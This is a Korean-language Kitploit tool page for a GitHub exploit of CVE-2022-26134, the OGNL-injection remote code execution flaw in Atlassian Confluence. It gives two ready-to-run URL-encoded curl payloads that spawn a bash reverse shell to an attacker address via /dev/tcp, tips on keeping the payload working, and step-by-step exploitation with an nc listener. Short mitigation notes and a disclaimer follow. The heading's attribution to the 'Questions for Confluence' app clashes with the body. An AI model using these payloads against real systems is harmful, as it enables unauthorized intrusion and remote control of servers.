Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-26134 — Atlassian의 Questions for Confluence 앱 CVE-2022-26134의 적극적 악용 | Kitploit
도구/GitHubGitHub/khalidhaimur/cve-2022-26134
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubkhalidhaimur/cve-2022-26134

CVE-2022-26134

Atlassian의 Questions for Confluence 앱 CVE-2022-26134의 적극적 악용

저장소 보기
1년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Confluence CVE-2022-26134 능동적 악용

개요

CVE-2022-26134는 Atlassian Confluence에 영향을 미치는 치명적인 원격 코드 실행(RCE) 취약점입니다. 이 취약점은 인증되지 않은 공격자가 취약한 엔드포인트에 OGNL 표현식을 주입하여 임의 코드를 실행할 수 있게 합니다.

영향을 받는 버전

  • 패치 릴리스 이전의 Atlassian Confluence Server 및 Data Center의 지원되는 모든 버전.

악용 세부 정보

다음 CURL 명령은 Java의 Nashorn 엔진을 활용하여 리버스 셸을 실행하는 이 취약점의 능동적 악용을 보여줍니다:

root@kitploit:~
curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/

이러한 수정을 수행하는 동안 URL 인코딩도 고려해야 합니다. 개념 증명(PoC)의 페이로드 문자열은 완전히 URL 인코딩되어 있지 않습니다. 특정 문자(특히 ".", "-" 및 "/")는 인코딩되지 않습니다. 항상 그런 것은 아니지만, 이 악용의 경우 페이로드 작동에 중요합니다. 이러한 문자가 인코딩되면 서버가 URL을 다르게 구문 분석하여 페이로드가 실행되지 않을 수 있습니다. 즉, 페이로드를 수정한 후 전체에 URL 인코딩을 적용할 수 없습니다.

curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.118.4/4444%200%3E%261%27%29.start%28%29%22%29%7D/

페이로드 분석

  1. ${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval(...)}
    • Java Nashorn 스크립트 엔진을 사용하여 OGNL 표현식을 평가합니다.
  2. new java.lang.ProcessBuilder().command('bash','-c','bash -i > /dev/tcp/10.0.0.28/1270 0>&1').start()
    • 10.0.0.28:1270으로 역연결되는 리버스 셸을 생성합니다.

악용 절차

  1. 공격 머신에 리스너를 설정합니다:
    root@kitploit:~
    nc -lvnp 1270
    
  2. CURL 악용 명령을 실행합니다.
  3. 악용에 성공하면 리버스 셸을 받게 됩니다.

완화 조치

  • Atlassian은 영향을 받는 버전에 대한 보안 패치를 발표했습니다. 즉시 최신 버전으로 업데이트하는 것이 좋습니다.
  • 신뢰할 수 없는 소스에서 Confluence 서버에 대한 접근을 제한합니다.
  • OGNL 표현식이 포함된 의심스러운 요청이 있는지 로그를 모니터링합니다.

참조

  • Atlassian 보안 권고
  • CVE-2022-26134 세부 정보

면책 조항

이 문서는 교육 목적으로만 제공됩니다. 승인되지 않은 시스템 악용은 불법이며 심각한 결과를 초래할 수 있습니다. 보안 평가를 수행하기 전에 항상 적절한 승인을 받으십시오.

도구 다운로드